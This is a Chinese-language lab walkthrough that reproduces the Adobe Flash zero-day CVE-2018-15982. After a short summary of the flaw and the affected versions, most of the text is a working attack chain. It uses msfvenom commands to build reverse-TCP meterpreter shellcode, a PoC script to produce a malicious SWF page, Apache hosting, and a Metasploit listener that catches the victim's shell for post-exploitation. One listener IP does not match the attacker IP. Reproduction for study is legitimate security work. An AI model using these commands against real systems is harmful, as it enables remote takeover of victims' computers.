CVE-2018-15982(Adobe Flash 0day)漏洞复现

漏洞概述：
2018年11月29日，360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动，通过一份俄文内容的医院员工问卷文档，携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序，该漏洞（CVE-2018-15982）允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码，从而获取对系统命令行的访问权限。
受影响的版本：
Adobe Flash Player <= 31.0.0.153
Adobe Flash Player Installer<= 31.0.0.108
不受影响的版本：
Adobe Flash Player 32.0.0.101
Adobe Flash Player Installer 31.0.0.122
漏洞复现利用：
攻击机：192.168.163.136 kali
靶机：Windows Server 2008 R2 条件：Adobe Flash 31.0.0.153及其之前的版本
下载大佬们上传的漏洞POC

使用msfvenom生成payload程序
msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=自行设定端口LHOST=攻击机IP-f raw>64.bin
msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=自行设定端口（与上面一致） LHOST=攻击机IP -f raw > 86.bin
会生成两个bin文件，名为 64bin,86bin，估计是64位和32位系统的payload 程序


poc执行生成poc
*cp .bin CVE-2018-15982_EXP/
cd CVE-2018-15982_EXP/

python CVE_2018_15982.py -i 86.bin -I 64.bin

生成exploit.swf和index.html文件

开启apache服务：

将生成的文件放入网站的根目录：
cp index.html /var/www/html/
cp exploit.swf /var/www/html/

查看网站根目录：
cd /var/www/html;ls

打开msfconsole,设置监听paylaod

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp_rc4

set lport 6666

set lhost 192.168.162.136

set RC4PASSWORD zale

exploit # 开始攻击，等待肉鸡上线
靶机访问服务器（IP：192.168.163.136）界面

成功拿到session

可以进行查看靶机IP:

查看靶机当前用户

查看靶机用户：

输入exit退出靶机cmd然后再输入bgrun vcc就可以直接看到靶机的操作界面

复现完毕。再见